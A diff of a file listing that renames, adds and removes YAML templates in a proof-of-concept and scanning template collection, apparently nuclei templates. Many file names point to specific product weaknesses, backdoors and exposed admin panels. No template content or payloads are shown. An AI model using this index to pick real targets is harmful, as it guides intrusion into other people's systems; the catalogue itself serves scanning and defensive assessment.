-./poc/other/activemq-panel-49.yaml
./poc/other/activemq-panel-50.yaml
./poc/other/activemq-panel-51.yaml
./poc/other/activemq-panel-52.yaml
+./poc/other/activemq-panel-53.yaml
./poc/other/activemq-panel.yaml
./poc/other/activemq-workflow.yaml
./poc/other/activity-reactions-for-buddypress-b67dd1397f4398dc9c75761e3da9f36b.yaml
@@ -53446,11 +53414,11 @@
./poc/other/activitytime.yaml
./poc/other/actuator.yaml
./poc/other/acunetix-360-installer.yaml
-./poc/other/acunetix-panel-54.yaml
./poc/other/acunetix-panel-55.yaml
+./poc/other/acunetix-panel-56.yaml
./poc/other/acunetix-panel-57.yaml
+./poc/other/acunetix-panel-58.yaml
./poc/other/acunetix-panel-59.yaml
-./poc/other/acunetix-panel.yaml
./poc/other/acunetix-wvs.yaml
./poc/other/acymailing-882e0d234614e9072c071f9d28362d8a.yaml
./poc/other/acymailing-e3e6bd9ad6bff9c17b39c48f591400ea.yaml
@@ -53783,9 +53751,9 @@
./poc/other/adminer-panel-5.yaml
./poc/other/adminer-panel-6.yaml
./poc/other/adminer-panel-7.yaml
-./poc/other/adminer-panel-74.yaml
./poc/other/adminer-panel-75.yaml
./poc/other/adminer-panel-76.yaml
+./poc/other/adminer-panel-77.yaml
./poc/other/adminer-panel.yaml
./poc/other/adminer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/adminer-plugin.yaml
@@ -53816,7 +53784,7 @@
./poc/other/adminpad-024c994284cb4846e1f6626814560a64.yaml
./poc/other/adminpad.yaml
./poc/other/adminset-panel-78.yaml
-./poc/other/adminset-panel-80.yaml
+./poc/other/adminset-panel-79.yaml
./poc/other/adminset-panel.yaml
./poc/other/adplugg-058141c25a1a879f99185b818d355e02.yaml
./poc/other/adplugg-4cde8c10175a7219c94dab4ded72ef4e.yaml
@@ -53884,6 +53852,7 @@
./poc/other/advance-menu-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/advance-menu-manager-plugin.yaml
./poc/other/advance-menu-manager.yaml
+./poc/other/advance-setup-119.yaml
./poc/other/advance-setup-120.yaml
./poc/other/advance-setup-121.yaml
./poc/other/advance-setup-122.yaml
@@ -54270,7 +54239,6 @@
./poc/other/akamai-cloudtest-250.yaml
./poc/other/akamai-cloudtest-251.yaml
./poc/other/akamai-cloudtest-252.yaml
-./poc/other/akamai-cloudtest-253.yaml
./poc/other/akamai-cloudtest-254.yaml
./poc/other/akamai-cloudtest.yaml
./poc/other/akeeba-installer.yaml
@@ -54325,7 +54293,6 @@
./poc/other/alibaba-anyproxy-fetchbody-anyfile-read.yaml
./poc/other/alibaba-anyproxy.yaml
./poc/other/alibaba-canal-info-leak-264.yaml
-./poc/other/alibaba-canal-info-leak-266.yaml
./poc/other/alibaba-canal-info-leak-267.yaml
./poc/other/alibaba-canal-info-leak.yaml
./poc/other/alibaba-canal-info-leak.yml
@@ -54333,6 +54300,7 @@
./poc/other/alibaba-nacos.yaml
./poc/other/alibaba-企业邮箱.yaml
./poc/other/alibaba_canal.yaml
+./poc/other/alienvault-usm-271.yaml
./poc/other/alienvault-usm-272.yaml
./poc/other/alienvault-usm-273.yaml
./poc/other/alienvault-usm-274.yaml
@@ -54596,10 +54564,11 @@
./poc/other/amplus-theme.yaml
./poc/other/amplus.yaml
./poc/other/ampps-admin-panel-304.yaml
-./poc/other/ampps-admin-panel-305.yaml
+./poc/other/ampps-admin-panel-306.yaml
+./poc/other/ampps-dirlisting-307.yaml
./poc/other/ampps-dirlisting-308.yaml
-./poc/other/ampps-dirlisting.yaml
./poc/other/ampps-panel-309.yaml
+./poc/other/ampps-panel-310.yaml
./poc/other/ampps-panel-311.yaml
./poc/other/amprion-gridloss-panel.yaml
./poc/other/amr-ical-events-list-79f8d987b4bea1a528f8215f9b8ae142.yaml
@@ -54694,6 +54663,7 @@
./poc/other/announcer.yaml
./poc/other/anonymous-restricted-content-a1c228113f48faf98c264ba16b96c84a.yaml
./poc/other/anonymous-restricted-content.yaml
+./poc/other/ansible-semaphore-panel.yaml
./poc/other/ansible-semaphore-panel.yml
./poc/other/answer-my-question-8a0ce85767e93614bc51f451c8474050.yaml
./poc/other/answer-my-question-90c1ca4071e6bd7fcadc8c89c4c29851.yaml
@@ -54746,9 +54716,9 @@
./poc/other/antreas-66ba1859ab560343222a23f4bdd2510b.yaml
./poc/other/antreas-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/antreas.yaml
-./poc/other/antsword-backdoor-333.yaml
./poc/other/antsword-backdoor-334.yaml
./poc/other/antsword-backdoor-335.yaml
+./poc/other/antsword-backdoor.yaml
./poc/other/anual-archive-233a1eb6f6f8782c599ef9a31673793f.yaml
./poc/other/anual-archive-9a361b8a04b5344c6923b947e14e5de1.yaml
./poc/other/anual-archive-e3376d4b2f2bf202a6fcc995d3f8fb1c.yaml
@@ -55052,7 +55022,6 @@
./poc/other/articlepublisherpro.yaml
./poc/other/artifactory-anonymous-deploy-547.yaml
./poc/other/artifactory-anonymous-deploy-548.yaml
-./poc/other/artifactory-anonymous-deploy-549.yaml
./poc/other/artifactory-anonymous-deploy.yaml
./poc/other/artifactory-workflow.yaml
./poc/other/artifactory_deploy.yaml
@@ -55131,6 +55100,7 @@
./poc/other/aspose-doc-exporter-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/aspose-doc-exporter-plugin.yaml
./poc/other/aspose-doc-exporter.yaml
+./poc/other/aspose-file-download-558.yaml
./poc/other/aspose-file-download-559.yaml
./poc/other/aspose-file-download-560.yaml
./poc/other/aspose-file-download-561.yaml
@@ -55155,8 +55125,8 @@
./poc/other/aspose-pdf-file-download-567.yaml
./poc/other/aspose-pdf-file-download-568.yaml
./poc/other/aspose-pdf-file-download-569.yaml
-./poc/other/aspose-pdf-file-download.yaml
./poc/other/aspose-words-exporter-file-download.yaml
+./poc/other/aspose-words-file-download-571.yaml
./poc/other/aspose-words-file-download-572.yaml
./poc/other/aspose-words-file-download-573.yaml
./poc/other/aspose-words-file-download-574.yaml
@@ -55289,6 +55259,7 @@
./poc/other/audio-video-download-buttons-for-youtube-plugin.yaml
./poc/other/audio-video-download-buttons-for-youtube.yaml
./poc/other/audio.yaml
+./poc/other/audiobookshelf-panel.yaml
./poc/other/audit.yaml
./poc/other/augmented-reality-1c6032510cc675f4443ed5957cd5ebf8.yaml
./poc/other/augmented-reality-afd76b54e4672fae1a12cf88cc16c59a.yaml
@@ -55366,7 +55337,6 @@
./poc/other/automatic-youtube-video-posts-91707c7304defdf4c829758df5f60ae2.yaml
./poc/other/automatic-youtube-video-posts.yaml
./poc/other/automation-direct-596.yaml
-./poc/other/automation-direct-597.yaml
./poc/other/automatisch-panel.yaml
./poc/other/autoptimize-1cd3f0584531536972eeaec5bd981bf9.yaml
./poc/other/autoptimize-2ecfdf7e957d875bca93a4c9bd866fc9.yaml
@@ -55552,7 +55522,7 @@
./poc/other/axis-happyaxis-3.yaml
./poc/other/axis-happyaxis-4.yaml
./poc/other/axis-happyaxis-669.yaml
-./poc/other/axis-happyaxis-670.yaml
+./poc/other/axis-happyaxis.yaml
./poc/other/axublog_v1-app-lfr.yaml
./poc/other/axway-securetransport-panel.yaml
./poc/other/axxon-client-panel.yaml
@@ -55688,8 +55658,8 @@
./poc/other/barelycorporate-theme.yaml
./poc/other/barelycorporate.yaml
./poc/other/barracuda-panel-684.yaml
-./poc/other/barracuda-panel-685.yaml
./poc/other/barracuda-panel-686.yaml
+./poc/other/barracuda-panel.yaml
./poc/other/barracuda-ssl-vpn.yaml
./poc/other/base64-encoderdecoder-09686b367b0230c3ebddda7a7420b807.yaml
./poc/other/base64-encoderdecoder-944ed1eede1fb5405084bd3b6720d51a.yaml
@@ -55707,10 +55677,10 @@
./poc/other/basic-cors-694.yaml
./poc/other/basic-cors-flash.yaml
./poc/other/basic-cors.yaml
-./poc/other/basic-dns-example.yaml
./poc/other/basic-interactive-world-map-5a936b7212cd70626f050c9aba22bae7.yaml
./poc/other/basic-interactive-world-map.yaml
./poc/other/basic-ztls.yaml
+./poc/other/basic.yaml
./poc/other/basicdir.yaml
./poc/other/baslider-2f67fdfc4f1a78ca3de5bde446cb180a.yaml
./poc/other/baslider-74e4a2a8812ec01ced90b2ffbb2ed2e3.yaml
@@ -55967,6 +55937,7 @@
./poc/other/betteroptin-09712df89f849ba85b08f5f0deb0865b.yaml
./poc/other/betteroptin.yaml
./poc/other/beyeon-iot.yaml
+./poc/other/beyondtrust-panel-720.yaml
./poc/other/beyondtrust-panel-721.yaml
./poc/other/beyondtrust-panel.yaml
./poc/other/beyondtrust-priv-panel.yaml
@@ -56015,7 +55986,6 @@
./poc/other/bigip-pwner-workflow.yaml
./poc/other/bigip-rest-panel.yaml
./poc/other/bigip-workflow.yaml
-./poc/other/bigip.yaml
./poc/other/bilin-uag系列网关.yaml
./poc/other/billingo-8170de96a4160ed4ed65414450456c1d.yaml
./poc/other/billingo.yaml
@@ -56068,8 +56038,8 @@
./poc/other/bitrix-log-file-found.yaml
./poc/other/bitrix-panel-746.yaml
./poc/other/bitrix-panel-747.yaml
+./poc/other/bitrix-panel-748.yaml
./poc/other/bitrix-panel-749.yaml
-./poc/other/bitrix-panel-750.yaml
./poc/other/bitrix-panel.yaml
./poc/other/bitrix-registration.yaml
./poc/other/bitrix-site-manager.yaml
@@ -56443,7 +56413,7 @@
./poc/other/bookshelf-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/bookshelf-plugin.yaml
./poc/other/bookshelf.yaml
-./poc/other/bookstack-panel-767.yaml
+./poc/other/bookstack-panel-766.yaml
./poc/other/bookstack-panel.yaml
./poc/other/bookx-5affa43bf6a3586e393859cf0e61918f.yaml
./poc/other/bookx.yaml
@@ -56758,8 +56728,8 @@
./poc/other/bubble-menu-825844feae3c0993ba26ca24f6beb496.yaml
./poc/other/bubble-menu-954097b83211a929d7262429b922e34b.yaml
./poc/other/bubble-menu.yaml
-./poc/other/buddy-panel-797.yaml
./poc/other/buddy-panel.yaml
+./poc/other/buddy-panel.yml
./poc/other/buddybadges-14c7b37e2a39ea3c10caf2185d80b202.yaml
./poc/other/buddybadges.yaml
./poc/other/buddyboss-media-794752612993f73caae67523973ec768.yaml
@@ -57155,13 +57125,13 @@
./poc/other/cachethq.yaml
./poc/other/cacti-WeakPass.yaml
./poc/other/cacti-cacti-info.yaml
-./poc/other/cacti-panel-829.yaml
+./poc/other/cacti-panel-828.yaml
./poc/other/cacti-panel.yaml
./poc/other/cacti-weathermap-file-write-1.yaml
./poc/other/cacti-weathermap-file-write-2.yaml
./poc/other/cacti-weathermap-file-write-830.yaml
./poc/other/cacti-weathermap-file-write-831.yaml
-./poc/other/cacti-weathermap-file-write-833.yaml
+./poc/other/cacti-weathermap-file-write-832.yaml
./poc/other/cacti-weathermap-file-write.yaml
./poc/other/cacti-weathermap-file-write.yml
./poc/other/cacti-workflow-834.yaml
@@ -57247,7 +57217,7 @@
./poc/other/campaign-url-builder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/campaign-url-builder-plugin.yaml
./poc/other/campaign-url-builder.yaml
-./poc/other/campaignmonitor-841.yaml
+./poc/other/campaignmonitor-842.yaml
./poc/other/campaignmonitor-843.yaml
./poc/other/campaignmonitor.yaml
./poc/other/campsite.yaml
@@ -57260,6 +57230,7 @@
./poc/other/campus-directory-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/campus-directory-plugin.yaml
./poc/other/campus-directory.yaml
+./poc/other/can-i-take-over-dns-852.yaml
./poc/other/can-i-take-over-dns.yaml
./poc/other/canal-admin.yaml
./poc/other/cancosoft-asset-management.yaml
@@ -57610,13 +57581,13 @@
./poc/other/ceph.yaml
./poc/other/cerberus-helpdesk.yaml
./poc/other/cerberus-malware.yaml
-./poc/other/cerebro-panel-878.yaml
./poc/other/cerebro-panel-879.yaml
./poc/other/cerebro-panel-880.yaml
+./poc/other/cerebro-panel-881.yaml
./poc/other/cerebro-panel.yaml
./poc/other/cerebro.yaml
-./poc/other/certificate-validation-882.yaml
./poc/other/certificate-validation-883.yaml
+./poc/other/certificate-validation-884.yaml
./poc/other/certificate-validation.yaml
./poc/other/cetc-工业防火墙.yaml
./poc/other/cf-geoplugin-58ca0142ffd9a9b2258c8cbb40585337.yaml
@@ -57712,7 +57683,8 @@
./poc/other/cgc-maintenance-mode-d395c79f773ee5d70312487be14f72dc.yaml
./poc/other/cgc-maintenance-mode.yaml
./poc/other/cgi-printenv-885.yaml
-./poc/other/cgi-test-page-888.yaml
+./poc/other/cgi-printenv.yaml
+./poc/other/cgi-test-page-887.yaml
./poc/other/cgi-test-page-889.yaml
./poc/other/cgi-test-page-890.yaml
./poc/other/cgi-test-page.yaml
@@ -57859,7 +57831,6 @@
./poc/other/checkpoint-firewall-enum.yaml
./poc/other/checkpoint-panel-1.yaml
./poc/other/checkpoint-panel-2.yaml
-./poc/other/checkpoint-panel-898.yaml
./poc/other/checkpoint-panel-899.yaml
./poc/other/checkpoint-panel.yaml
./poc/other/checkpoint-workflow.yaml
@@ -57955,8 +57926,8 @@
./poc/other/cip4-folder-download-widget.yaml
./poc/other/ciphermail-email-encryption-gateway.yaml
./poc/other/circarlife-setup-917.yaml
+./poc/other/circarlife-setup-918.yaml
./poc/other/circarlife-setup-919.yaml
-./poc/other/circarlife-setup-920.yaml
./poc/other/circarlife-setup-921.yaml
./poc/other/circarlife-workflow.yaml
./poc/other/circle-image-slider-with-lightbox-4fd17830432213426bf64fdc98490b12.yaml
@@ -57979,6 +57950,7 @@
./poc/other/citrix-access-gateway.yaml
./poc/other/citrix-metaframe.yaml
./poc/other/citrix-netscaler.yaml
+./poc/other/citrix-oob-memory-read.yaml
./poc/other/citrix-receiver.yaml
./poc/other/citrix-workflow.yaml
./poc/other/citrix-xcp.yaml
@@ -58071,7 +58043,7 @@
./poc/other/clearfy-plugin.yaml
./poc/other/clearfy.yaml
./poc/other/clearpass-policy-manager-1000.yaml
-./poc/other/clearpass-policy-manager-997.yaml
+./poc/other/clearpass-policy-manager-1001.yaml
./poc/other/clearpass-policy-manager-998.yaml
./poc/other/clearpass-policy-manager-999.yaml
./poc/other/clearpass-policy-manager.yaml
@@ -58142,8 +58114,8 @@
./poc/other/client-portal-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/client-portal-plugin.yaml
./poc/other/client-portal.yaml
+./poc/other/clientaccesspolicy-1005.yaml
./poc/other/clientaccesspolicy-1006.yaml
-./poc/other/clientaccesspolicy-1007.yaml
./poc/other/clientaccesspolicy.yaml
./poc/other/clientexec.yaml
./poc/other/clio-grow-form-0f4e293198ec169f18fb2dff762bdf30.yaml
@@ -58395,7 +58367,7 @@
./poc/other/codup-read-only-admin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/codup-read-only-admin-plugin.yaml
./poc/other/codup-read-only-admin.yaml
-./poc/other/cofense-vision-panel-1141.yaml
+./poc/other/cofense-vision-panel-1142.yaml
./poc/other/cofense-vision-panel.yaml
./poc/other/cogent-datahub.yaml
./poc/other/colasoft-mdp.yaml
@@ -58774,7 +58746,6 @@
./poc/other/contact-form-7-skins.yaml
./poc/other/contact-form-7-style-ba8463f8475723d7b9fa15f84254b841.yaml
./poc/other/contact-form-7-style.yaml
-./poc/other/contact-form-7.yaml
./poc/other/contact-form-add-2770bbb352eafe34363256cb285ef179.yaml
./poc/other/contact-form-add-303736b9e91ff80899d370834b9fa7f2.yaml
./poc/other/contact-form-add-34b4a6bc490c1a27759b7a1aa3c2b1d4.yaml
@@ -59507,6 +59478,7 @@
./poc/other/cross-origin-opener-policy.yaml
./poc/other/cross-rss-80679996637c491ca713f9608717b246.yaml
./poc/other/cross-rss.yaml
+./poc/other/crossdomain-xml-1267.yaml
./poc/other/crossdomain-xml-1268.yaml
./poc/other/crossdomain-xml-1269.yaml
./poc/other/crossdomin-xml.yaml
@@ -59545,6 +59517,7 @@
./poc/other/cryptocurrency-widgets-pack-df87c30565c27eb58e0271f0dfd6d08b.yaml
./poc/other/cryptocurrency-widgets-pack.yaml
./poc/other/cryptocurrency.yaml
+./poc/other/csod-panel-1286.yaml
./poc/other/csod-panel-1287.yaml
./poc/other/csod-panel-1288.yaml
./poc/other/csod-panel-1289.yaml
@@ -59851,6 +59824,7 @@
./poc/other/custom-version.yaml
./poc/other/custom_nuclei-1.yaml
./poc/other/custom_nuclei-2.yaml
+./poc/other/custom_nuclei-3.yaml
./poc/other/custom_nuclei-4.yaml
./poc/other/custom_nuclei-5.yaml
./poc/other/custom_nuclei-6.yaml
@@ -59899,9 +59873,8 @@
./poc/other/d-link-arbitary-fileread-7040.yaml
./poc/other/d-link-arbitary-fileread-7041.yaml
./poc/other/d-link-arbitary-fileread-7042.yaml
-./poc/other/d-link-arbitary-fileread-7044.yaml
+./poc/other/d-link-arbitary-fileread-7043.yaml
./poc/other/d-link-arbitary-fileread-7046.yaml
-./poc/other/d-link-wireless-7047.yaml
./poc/other/d-link-wireless-7048.yaml
./poc/other/d-link-wireless-7049.yaml
./poc/other/d-link-wireless-7050.yaml
@@ -60038,7 +60011,6 @@
./poc/other/dd-post-carousel.yaml
./poc/other/dd-rating-abefceeefb99cff148ca67c77873866d.yaml
./poc/other/dd-rating.yaml
-./poc/other/dead-host-with-cname-6786.yaml
./poc/other/dead-host-with-cname.yaml
./poc/other/deal-of-the-day-ff9293ba28748efa2ab9a2fe77385468.yaml
./poc/other/deal-of-the-day.yaml
@@ -60069,6 +60041,7 @@
./poc/other/defender-security-eb34b3c3b8ff1ca77abae88402bd4aa7.yaml
./poc/other/defender-security.yaml
./poc/other/deimos-c2-jarm.yaml
+./poc/other/deimos-c2.yaml
./poc/other/dejavu-78b157490e17d28e7e04d9f12a1bb6bd.yaml
./poc/other/dejavu-8694503a0b15276ddaea2d6b4be99aaa.yaml
./poc/other/dejavu-9449ef76879953c9ac6d19c4c293def1.yaml
@@ -60196,7 +60169,6 @@
./poc/other/development-logs-2.yaml
./poc/other/development-logs-3.yaml
./poc/other/development-logs-6987.yaml
-./poc/other/development-logs-6989.yaml
./poc/other/development-logs.yaml
./poc/other/devformatter-0473642f46ba628f35ee6f5a15e577ba.yaml
./poc/other/devformatter-4f0edd8cd8a7b5fcd66978824cc8f948.yaml
@@ -60228,7 +60200,7 @@
./poc/other/dialogs-plugin.yaml
./poc/other/dialogs.yaml
./poc/other/dian-diagnostics.yaml
-./poc/other/diaowen-fileread(1).yaml
+./poc/other/diaowen-fileread.yaml
./poc/other/diaowen-system.yaml
./poc/other/diary-31eb77eaefc61e112478e9f1952e822d.yaml
./poc/other/diary-9099a88f255af571eb05254581f8054d.yaml
@@ -60267,6 +60239,7 @@
./poc/other/diplomat-da700602e0176e1b1b6120899ff50989.yaml
./poc/other/diplomat.yaml
./poc/other/dir-contents-disc-logs-6999.yaml
+./poc/other/dir-listing-7003.yaml
./poc/other/dir-listing-7004.yaml
./poc/other/dir-listing-7005.yaml
./poc/other/dir-listing-7007.yaml
@@ -60397,9 +60370,11 @@
./poc/other/dk-pricr-responsive-pricing-table-b16a43b12a77fac981f6dff5bee7fae6.yaml
./poc/other/dk-pricr-responsive-pricing-table-fcb02e31136900f66af826680ccfc854.yaml
./poc/other/dk-pricr-responsive-pricing-table.yaml
+./poc/other/dlink-850l-info-leak-7035.yaml
./poc/other/dlink-850l-info-leak-7036.yaml
./poc/other/dlink-850l-info-leak-7037.yaml
./poc/other/dlink-850l-info-leak-7038.yaml
+./poc/other/dlink-850l-info-leak-7039.yaml
./poc/other/dlink-850l-info-leak.yml
./poc/other/dlink-file-read.yaml
./poc/other/dlink-panel.yaml
@@ -60408,7 +60383,6 @@
./poc/other/dmxready-portfolio-manager.yaml
./poc/other/dnp-firewall.yaml
./poc/other/dns-multiple-example.yaml
-./poc/other/dns-value-share-template-3.yaml
./poc/other/docebo-elearning-panel.yaml
./poc/other/docket-cache-29d289a525039ca1604e348c45bb194f.yaml
./poc/other/docket-cache-9d3b68fb0167e0f3e4bf3e86cef87a84.yaml
@@ -60451,7 +60425,6 @@
./poc/other/doko-theme.yaml
./poc/other/doko.yaml
./poc/other/dokuwiki-installer.yaml
-./poc/other/dokuwiki-panel.yaml
./poc/other/dokuwiki.yaml
./poc/other/dolibarr-installer.yaml
./poc/other/dolibarr-panel.yaml
@@ -60711,6 +60684,7 @@
./poc/other/droit-elementor-addons-430c8b1464024c3ce26fa2faca084e29.yaml
./poc/other/droit-elementor-addons.yaml
./poc/other/drone-ci-panel-7090.yaml
+./poc/other/drone-ci-panel-7091.yaml
./poc/other/drone-ci-panel.yaml
./poc/other/drone-ci-panel.yml
./poc/other/drop-shadow-boxes-19be81a9cc969d8ecc9f8b98996baee0.yaml
@@ -60754,12 +60728,13 @@
./poc/other/drugpak.yaml
./poc/other/druid-monitor-7100.yaml
./poc/other/druid-monitor-7101.yaml
-./poc/other/druid-monitor-7103.yaml
+./poc/other/druid-monitor-7102.yaml
./poc/other/druid-monitor-7104.yaml
./poc/other/druid-monitor.yaml
./poc/other/druid-panel.yaml
./poc/other/ds-site-message-875e5ff5a57ff63bfa2f151fee3c096b.yaml
./poc/other/ds-site-message.yaml
+./poc/other/ds-store-file.yaml
./poc/other/ds-store-leak.yaml
./poc/other/ds-suit-ff9293ba28748efa2ab9a2fe77385468.yaml
./poc/other/ds-suit.yaml
@@ -60781,6 +60756,7 @@
./poc/other/dspace.yaml
./poc/other/dss-download-fileread-7116.yaml
./poc/other/dss-download-fileread-7117.yaml
+./poc/other/dss-download-fileread.yaml
./poc/other/dsubscribers-74ac1eb0b977357b67ddd92eb354589f.yaml
./poc/other/dsubscribers-945733509c68d8720d9e8d2deb68c79f.yaml
./poc/other/dsubscribers-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -60923,8 +60899,7 @@
./poc/other/dx-share-selection.yaml
./poc/other/dx-watermark-3bef3aced10727d0ec75e98bd1b40fca.yaml
./poc/other/dx-watermark.yaml
-./poc/other/dxplanning-panel.yaml
-./poc/other/dynamic-broadcast-receiver-7140.yaml
+./poc/other/dynamic-broadcast-receiver-7141.yaml
./poc/other/dynamic-broadcast-receiver-7142.yaml
./poc/other/dynamic-broadcast-receiver.yaml
./poc/other/dynamic-content-for-elementor-74b47d0324febbea267a2d8f675a7149.yaml
@@ -61110,6 +61085,7 @@
./poc/other/easy-media-gallery-pro-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/easy-media-gallery-pro-listing-7150.yaml
./poc/other/easy-media-gallery-pro-listing-7151.yaml
+./poc/other/easy-media-gallery-pro-listing-7152.yaml
./poc/other/easy-media-gallery-pro-listing-7153.yaml
./poc/other/easy-media-gallery-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/easy-media-gallery-pro-plugin.yaml
@@ -61960,6 +61936,7 @@
./poc/other/entrust-identityguard-1.yaml
./poc/other/entrust-identityguard-2.yaml
./poc/other/entrust-identityguard.yaml
+./poc/other/env.yaml
./poc/other/envato-elements-1ca8761aad01c087e129c9ba5b7170f9.yaml
./poc/other/envato-elements.yaml
./poc/other/envialosimple-email-marketing-y-newsletters-gratis-61c9bb577c39ae281aa4842e613affa5.yaml
@@ -61974,7 +61951,6 @@
./poc/other/environment-rb.yaml
./poc/other/envision-gateway-7226.yaml
./poc/other/envision-gateway-7227.yaml
-./poc/other/envision-gateway.yaml
./poc/other/envo-business-157cf14a019f2f39567d396451ba436d.yaml
./poc/other/envo-business-709fcd2d01e6508e0448c347b88dab61.yaml
./poc/other/envo-business-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -62074,6 +62050,7 @@
./poc/other/error-logs-7251.yaml
./poc/other/error-logs-7253.yaml
./poc/other/error-logs-7254.yaml
+./poc/other/error-logs-7255.yaml
./poc/other/error-logs-7256.yaml
./poc/other/error-logs-8.yaml
./poc/other/error-logs-9.yaml
@@ -62764,6 +62741,7 @@
./poc/other/ezoic-integration-cce4dc27b5c66be86d956ad30a7a8970.yaml
./poc/other/ezoic-integration-cfe872c971b4228525dc363d4a798eb7.yaml
./poc/other/ezoic-integration.yaml
+./poc/other/f-secure-policy-manager-7560.yaml
./poc/other/f-secure-policy-manager-7561.yaml
./poc/other/f-secure-policy-manager-7562.yaml
./poc/other/f-secure-policy-manager-7563.yaml
@@ -62907,7 +62885,7 @@
./poc/other/fathom-analytics.yaml
./poc/other/fatpipe-backdoor-7433.yaml
./poc/other/fatpipe-ipvpn-panel-7434.yaml
-./poc/other/fatpipe-ipvpn-panel-7436.yaml
+./poc/other/fatpipe-ipvpn-panel-7435.yaml
./poc/other/fatpipe-ipvpn-panel.yaml
./poc/other/fatpipe-mpvpn-panel.yaml
./poc/other/fatpipe-warp-panel.yaml
@@ -63068,7 +63046,7 @@
./poc/other/file-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/file-manager-plugin.yaml
./poc/other/file-manager.yaml
-./poc/other/file-scheme-7468.yaml
+./poc/other/file-scheme-7467.yaml
./poc/other/file-scheme-7469.yaml
./poc/other/file-scheme.yaml
./poc/other/filebird-61cf2f1a37771fa3cda817355d5faa22.yaml
@@ -63098,6 +63076,7 @@
./poc/other/filezilla-1.yaml
./poc/other/filezilla-2.yaml
./poc/other/filezilla-3.yaml
+./poc/other/filezilla-7470.yaml
./poc/other/filezilla-7471.yaml
./poc/other/filezilla-phish.yaml
./poc/other/filezilla.yaml
@@ -63774,6 +63753,7 @@
./poc/other/formmail.yaml
./poc/other/formula-5b672e9f77cfd4654d3abf551473cec4.yaml
./poc/other/formula-b0133eeb83592f6bc091b8166dad158b.yaml
+./poc/other/formula.yaml
./poc/other/forsun-科盾安全网关控制台.yaml
./poc/other/fortiadc-panel.yaml
./poc/other/fortiap-panel.yaml
@@ -63785,7 +63765,6 @@
./poc/other/fortinet-fortiddos-panel.yaml
./poc/other/fortinet-fortigate-panel-7534.yaml
./poc/other/fortinet-fortigate-panel-7535.yaml
-./poc/other/fortinet-fortigate-panel-7536.yaml
./poc/other/fortinet-fortigate-panel.yaml
./poc/other/fortinet-fortigate.yaml
./poc/other/fortinet-fortiguard.yaml
@@ -63825,7 +63804,6 @@
./poc/other/fotography.yaml
./poc/other/fotomoto.yaml
./poc/other/foulenzer-advanced.yaml
-./poc/other/foulenzer-subdomain-tk (copy 1).yaml
./poc/other/foulenzer-subdomain-tk.yaml
./poc/other/foulenzer-tech.yaml
./poc/other/founder-all-media-editing-system.yaml
@@ -64388,7 +64366,7 @@
./poc/other/geoserver.yaml
./poc/other/geotrust-cert.yaml
./poc/other/gerpgo-erp.yaml
-./poc/other/gespage-panel-7605.yaml
+./poc/other/gespage-panel-7606.yaml
./poc/other/gespage-panel.yaml
./poc/other/gespage-workflow.yaml
./poc/other/gestion-pymes-4e27f6575c1bbb81bb82fae9669ce875.yaml
@@ -64406,7 +64384,6 @@
./poc/other/get-env(1).yaml
./poc/other/get-env.yaml
./poc/other/get-iam-users.yaml
-./poc/other/get-override-sni.yaml
./poc/other/get-query-string.yaml
./poc/other/get-site-to-phone-by-qr-code-53f9f187ffc31e706ad6ef27544d8f05.yaml
./poc/other/get-site-to-phone-by-qr-code.yaml
@@ -64424,7 +64401,6 @@
./poc/other/get-url-cron.yaml
./poc/other/get-without-scheme.yaml
./poc/other/get-your-number.yaml
-./poc/other/get.yaml
./poc/other/getresponse-integration-e5d7fa71e6908442857a0cb0670fa481.yaml
./poc/other/getresponse-integration-fa4bcc5aa8ddc19efefa3934ed36cbc7.yaml
./poc/other/getresponse-integration.yaml
@@ -64626,7 +64602,6 @@
./poc/other/global-traffic-statistics.yaml
./poc/other/globalprotect-panel-1.yaml
./poc/other/globalprotect-panel-2.yaml
-./poc/other/globalprotect-panel-7720.yaml
./poc/other/globalprotect-panel-7721.yaml
./poc/other/globalprotect-panel.yaml
./poc/other/globalsign-cert.yaml
@@ -64641,11 +64616,10 @@
./poc/other/glossary-by-codeat.yaml
./poc/other/glossword.yaml
./poc/other/glowroot-panel.yaml
-./poc/other/glpi-directory-listing-7734.yaml
+./poc/other/glpi-directory-listing.yaml
./poc/other/glpi-panel.yaml
./poc/other/glpi-workflow.yaml
./poc/other/glpi.yaml
-./poc/other/glpidirectorylisting(1).yaml
./poc/other/glpidirectorylisting.yaml
./poc/other/gm-electronic-security-document-management-system.yaml
./poc/other/gm-woo-product-list-widget.yaml
@@ -64685,7 +64659,7 @@
./poc/other/gocodes.yaml
./poc/other/gocron-panel.yaml
./poc/other/gogs-panel.yaml
-./poc/other/gogs-workflow.yaml
+./poc/other/gogs-workflow-7760.yaml
./poc/other/gogs.yaml
./poc/other/golang-metrics.yaml
./poc/other/golangci-lint.yml
@@ -64705,6 +64679,7 @@
./poc/other/good-bad-comments-83f695fbf2f9017dee2e874c9671786d.yaml
./poc/other/good-bad-comments.yaml
./poc/other/good10000-tios.yaml
+./poc/other/goodjob-dashboard.yaml
./poc/other/goodnews5-8ed36f6d7d78831e7535c4c75cee15dc.yaml
./poc/other/goodnews5.yaml
./poc/other/goodnex-78042e81e14608c6a526568b143d60ec.yaml
@@ -64986,7 +64961,6 @@
./poc/other/gzmwiccard-system.yaml
./poc/other/gzqxrh-system.yaml
./poc/other/gzsa-intranet-security.yaml
-./poc/other/h2console-panel-7866.yaml
./poc/other/h2console-panel.yaml
./poc/other/h2csmuggle-nuclei.yaml
./poc/other/h2o-arbitary-file-read.yaml
@@ -65008,11 +64982,11 @@
./poc/other/h5p-css-editor.yaml
./poc/other/h5s-video-platform.yaml
./poc/other/h_ui.yaml
-./poc/other/hack5-cloud-c2.yaml
./poc/other/hadoop-administration.yaml
./poc/other/hadoop-hue.yaml
./poc/other/haidaoshop.yaml
./poc/other/haitian-oa.yaml
